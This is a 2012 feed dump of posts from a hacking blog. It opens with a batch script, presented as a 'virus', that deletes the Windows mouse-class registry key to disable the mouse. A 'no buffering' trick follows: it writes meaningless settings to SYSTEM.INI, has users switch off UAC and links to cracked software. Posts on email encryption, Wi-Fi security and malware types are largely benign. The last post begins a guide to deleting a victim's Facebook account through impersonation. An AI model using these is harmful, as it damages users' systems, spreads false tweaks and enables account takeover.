&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDzwVshoG7Y0me4xQJZTNYU_-5aNFwv9kmjcwOfJ8F09UZmswRbWCzpP9AJ_J029yJYFHnEKujoxcbaMXN4KGC3xK4u3SMqSABp8rchId-UPp27w_Bbt-tZtvoa5-BiHrZIR7jUwiX6IU/s1600/mouse.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDzwVshoG7Y0me4xQJZTNYU_-5aNFwv9kmjcwOfJ8F09UZmswRbWCzpP9AJ_J029yJYFHnEKujoxcbaMXN4KGC3xK4u3SMqSABp8rchId-UPp27w_Bbt-tZtvoa5-BiHrZIR7jUwiX6IU/s1600/mouse.jpg&quot; height=&quot;195&quot; width=&quot;320&quot; /&gt;&amp;nbsp;&lt;/a&gt; &lt;/div&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Make a virus to disable mouse&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;Open Notepad and copy below codes&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;br /&gt;rem ---------------------------------&lt;br /&gt;&amp;nbsp;rem Disable Mouse&lt;br /&gt;&amp;nbsp;set key=&quot;HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass&quot;&lt;br /&gt;&amp;nbsp;reg delete %key%&lt;br /&gt;&amp;nbsp;reg add %key% /v Start /t REG_DWORD /d 4&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;rem ---------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;Save this file as virus.bat&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;Done you just created your virus.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/make-virus-to-disable-mouse.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDzwVshoG7Y0me4xQJZTNYU_-5aNFwv9kmjcwOfJ8F09UZmswRbWCzpP9AJ_J029yJYFHnEKujoxcbaMXN4KGC3xK4u3SMqSABp8rchId-UPp27w_Bbt-tZtvoa5-BiHrZIR7jUwiX6IU/s72-c/mouse.jpg" height="72" width="72"/><thr:total>10</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-4418767821321512394</guid><pubDate>Fri, 26 Oct 2012 16:03:00 +0000</pubDate><atom:updated>2012-10-26T09:03:53.823-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">Web Hacking</category><title>WATCH AND LISTEN AUDIO &amp; VIDEO LIVE WITHOUT BUFFERING ON 2G Connection</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;u&gt;WATCH AND LISTEN AUDIO &amp;amp; VIDEO LIVE WITHOUT BUFFERING ON 2G Connection&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLl8utHwzLxuimgUDPM6L7swhUTnfRih892OcGdJ1XHq397_35OcdO4qmztX8lM62f5nTQbWjXpvgwkKAwkS2GP5IrH3ufqfI3MqSVOaKO3DobRCg6DXCpBtVZ5jigkTYmzW6hT915jik/s1600/youtubeBuffering.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLl8utHwzLxuimgUDPM6L7swhUTnfRih892OcGdJ1XHq397_35OcdO4qmztX8lM62f5nTQbWjXpvgwkKAwkS2GP5IrH3ufqfI3MqSVOaKO3DobRCg6DXCpBtVZ5jigkTYmzW6hT915jik/s1600/youtubeBuffering.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;A 2G
 internet user really suck. You cannot download file Quickly and the 
most important that many user faces is, they cannot watch or listen 
online streaming video or audio.They cannot even watch YouTube video 
without buffering...&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;So my 
reader today i am giving you and awesome tricks to play video without 
buffering even with the speed of 30-40 KBps. You can watch live TV and 
also listen online Radio without buffering.&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Step 1&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Open run command box by pressing ctrl+r together and in the box that appear type SYSTEM.INI&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Note: Your UAC or &quot;User Account Control&quot; should be set to &quot;Never notify&quot;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;Step 2&lt;/span&gt;&lt;/h4&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Copy and paste the below line in the &lt;span style=&quot;font-size: medium;&quot;&gt;SYSTEM.INI and save it&lt;span style=&quot;background-color: #38761d;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;page buffer=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;load=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;download=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;save=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;back=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;search=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;sound=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;webcam=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;voice=1000000Tbps&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;




&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Here is the picture of &lt;/span&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;SYSTEM.INI&lt;/span&gt;&lt;/i&gt; before chnaging&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBDPFQGCZJu4bXy_swCzOAZznKmkTfX2Bc62PhzLaTQOkEvYAGixu05FW9zBkWodJMeTSbgsAkZEDcNHbEbHxPEFwFqMfi2bgRRe8tXRJBlNv6ai4a4fOVYYlbnA7hza4jHvFqJGiEX40/s1600/system-ini.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBDPFQGCZJu4bXy_swCzOAZznKmkTfX2Bc62PhzLaTQOkEvYAGixu05FW9zBkWodJMeTSbgsAkZEDcNHbEbHxPEFwFqMfi2bgRRe8tXRJBlNv6ai4a4fOVYYlbnA7hza4jHvFqJGiEX40/s1600/system-ini.jpg&quot; height=&quot;229&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
After Changing&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9445XoHLwdLBOMV9M19JRBvsGzO_aXcmjWz2k9XyNQf-xTeLyjODsAhegjG6_2m9us-BHpZVJ_7hyphenhyphenSiZfMgYzy5OFpjPphF411wYJELIKqRwUpZnnImJeQtARSWien-DdcW0fFlu04yo/s1600/system-ini1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9445XoHLwdLBOMV9M19JRBvsGzO_aXcmjWz2k9XyNQf-xTeLyjODsAhegjG6_2m9us-BHpZVJ_7hyphenhyphenSiZfMgYzy5OFpjPphF411wYJELIKqRwUpZnnImJeQtARSWien-DdcW0fFlu04yo/s1600/system-ini1.jpg&quot; height=&quot;229&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Step 3)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Download this software name Speed-bits video accelerator&amp;nbsp; from here &lt;a href=&quot;http://adf.ly/2542194/http://www.slingfile.com/file/RvUgWEn6zY&quot; target=&quot;_blank&quot;&gt;Speed-bits&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;extract the rar file and there you will find 3 file&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Speedbits video accelerator setup.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Video accelerator crack.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Instruction file.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;


&lt;span style=&quot;font-size: medium;&quot;&gt;read the 
Instruction and install the software. You will notice after this tricks 
you can watch YouTube video without buffering and also you can watch 
live TV and listen to online Radio.&lt;/span&gt; &lt;span style=&quot;color: purple;&quot;&gt;ENJoy!&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/watch-videos-free-without-buffring.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLl8utHwzLxuimgUDPM6L7swhUTnfRih892OcGdJ1XHq397_35OcdO4qmztX8lM62f5nTQbWjXpvgwkKAwkS2GP5IrH3ufqfI3MqSVOaKO3DobRCg6DXCpBtVZ5jigkTYmzW6hT915jik/s72-c/youtubeBuffering.jpg" height="72" width="72"/><thr:total>16</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-7574649725377924633</guid><pubDate>Fri, 26 Oct 2012 11:33:00 +0000</pubDate><atom:updated>2012-10-26T04:33:10.269-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Gmail Hacking</category><category domain="http://www.blogger.com/atom/ns#">Msn Hacaking</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">Yahoo Hacking</category><title>How to Send Password Protected Email Messages </title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&amp;nbsp;&lt;u&gt;&lt;i&gt;&lt;b&gt;How to Send Password Protected Email Messages&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
If you have to send&amp;nbsp; information like credit card numbers, Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept Ur email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;a href=&quot;http://adf.ly/2542194/https://lockbin.com/&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt; to go LockBin online service.&lt;/li&gt;
&lt;li&gt;Fill the form with your desired password.&lt;/li&gt;
&lt;li&gt;In the text filled write your message. You can also attach a file if you want.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKggn8jVAhlrfPgPyTxw_5TJgqi4Zv4JKck_JKoPhUbH3xrQYQJb0TtrOdtjbvaBO79hmlqQ-gYC0Mclls6FWC1RUt8TETn6BEWM1FloVIflYmdVBWkq6cDZzPhKUs4GxS65XvpNXBtHw/s1600/emailmessages.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKggn8jVAhlrfPgPyTxw_5TJgqi4Zv4JKck_JKoPhUbH3xrQYQJb0TtrOdtjbvaBO79hmlqQ-gYC0Mclls6FWC1RUt8TETn6BEWM1FloVIflYmdVBWkq6cDZzPhKUs4GxS65XvpNXBtHw/s1600/emailmessages.png&quot; height=&quot;320&quot; width=&quot;224&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;After this, click on Submit button.&lt;/li&gt;
&lt;li&gt;Now your password protected mail will be sent. (Receiver will only get a link to your password protected and encrypted email)&lt;/li&gt;
&lt;li&gt;When receiver clicks on that link&amp;nbsp; it will prompt to enter the password otherwise it will not be open. &lt;/li&gt;
&lt;/ul&gt;
That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself. Enjoy! &lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/send-password-protected-emails.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKggn8jVAhlrfPgPyTxw_5TJgqi4Zv4JKck_JKoPhUbH3xrQYQJb0TtrOdtjbvaBO79hmlqQ-gYC0Mclls6FWC1RUt8TETn6BEWM1FloVIflYmdVBWkq6cDZzPhKUs4GxS65XvpNXBtHw/s72-c/emailmessages.png" height="72" width="72"/><thr:total>11</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-2232993180787472419</guid><pubDate>Mon, 22 Oct 2012 21:06:00 +0000</pubDate><atom:updated>2012-10-22T14:06:42.549-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">virus protection</category><category domain="http://www.blogger.com/atom/ns#">Wireless Hacks</category><title>How To Secure Wifi </title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYxOY5xeEzyEWspT1OiJXQ3GwtvBwFCpeGj-AZn4tgquT5ZIFharELEB911jQPgWUKg7Bx28oqSZIgrqPZfSBuT9m8QLEQZs_93frOuSLvrK2TCBkSdUvEswV1I8xUPlkFK_LYlbE-IfE/s1600/wifi.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYxOY5xeEzyEWspT1OiJXQ3GwtvBwFCpeGj-AZn4tgquT5ZIFharELEB911jQPgWUKg7Bx28oqSZIgrqPZfSBuT9m8QLEQZs_93frOuSLvrK2TCBkSdUvEswV1I8xUPlkFK_LYlbE-IfE/s1600/wifi.jpg&quot; height=&quot;221&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;u&gt;Wifi stands for Wireless Fidelity.&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.&lt;br /&gt;
&amp;nbsp;The step by step&amp;nbsp; guide given below summarize all the necessary steps you should take for securing your wifi network.&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Change Default Administrator Passwords (and Usernames)&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Turn on (Compatible) WPA / WEP Encryption&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Enable MAC Address Filtering&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;Mac addresses are also known as&amp;nbsp; physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to those devices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Enable Firewalls On Each Computer and the Router&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Position the Router or Access Point Safely&lt;/li&gt;
&lt;/ul&gt;
A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Turn Off the Network During Extended Periods of Non-Use&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;Turn of the router when it is not used.It will secure your wifi connection by giving out less access&amp;nbsp; time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/how-to-secure-wifi.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYxOY5xeEzyEWspT1OiJXQ3GwtvBwFCpeGj-AZn4tgquT5ZIFharELEB911jQPgWUKg7Bx28oqSZIgrqPZfSBuT9m8QLEQZs_93frOuSLvrK2TCBkSdUvEswV1I8xUPlkFK_LYlbE-IfE/s72-c/wifi.jpg" height="72" width="72"/><thr:total>11</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-8729269843774598725</guid><pubDate>Mon, 22 Oct 2012 17:18:00 +0000</pubDate><atom:updated>2012-10-22T10:18:21.936-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category domain="http://www.blogger.com/atom/ns#">Rats</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><category domain="http://www.blogger.com/atom/ns#">virus protection</category><title>Difference B/w Virus , Worms ,Trojan &amp; Spyware : VIRUSESs</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Difference B/w Virus , Worms ,Trojan &amp;amp; Spyware&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;All of us have heard already about &lt;b&gt;VIRUS , WORMS , TROJANS and SPYWARES&lt;/b&gt; but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i&#39;ll tell about difference them&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;VIRUS&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&amp;nbsp;A virus is a self replication program and software which is attached to an executeable&amp;nbsp;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program. &lt;br /&gt;
&lt;b&gt;&lt;i&gt;Worms&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
Worms are very similar to viruses but differ in way that they don&#39;t bind themselves to executable files instead&amp;nbsp; to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.&lt;i&gt;&lt;b&gt;&lt;br /&gt;Trojan Horse&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to&amp;nbsp; facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.&lt;br /&gt;&lt;i&gt;&lt;b&gt;Spyware&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.&lt;br /&gt;
&lt;br /&gt;
Here is the list of names of most harmful virus and worms in the history of computers&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;Storm Worm&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Leap-A/Oompa- A&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Sasser and Netsky&lt;/li&gt;
&lt;li&gt;&amp;nbsp;MyDome (Novarg)&lt;/li&gt;
&lt;li&gt;&amp;nbsp;SQL Slammer / Sapphire&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Nimda&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Code Red and Code Red II&lt;/li&gt;
&lt;li&gt;&amp;nbsp;The Klez&lt;/li&gt;
&lt;li&gt;&amp;nbsp;ILOVEYOU&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Melissa &lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/virus-worm-trojan-spyware.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-1004991550705948507</guid><pubDate>Fri, 19 Oct 2012 16:12:00 +0000</pubDate><atom:updated>2012-10-19T09:12:07.663-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Delete Any Facebook Account : Facebook Hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s1600/facebook.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s320/facebook.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Delete Any Facebook Account&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
There is a method to delete any facebook profile .It works 100 percent But its just for educational purpose. Deleted Profile can never be recovered. Use wisely.&lt;br /&gt;&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
WHAT ALL U NEED ?&lt;/h4&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;Victim&#39;s profile link ( you can get it easily )&lt;/li&gt;
&lt;li&gt;&amp;nbsp;His/Her Email which he/she uses to sign in&lt;/li&gt;
&lt;li&gt;&amp;nbsp;His/Her birth date which he/she has used in the profile&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Make an Email ID on gmail or yahoo with the first name and last name same as on victim&#39;s facebook profile.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
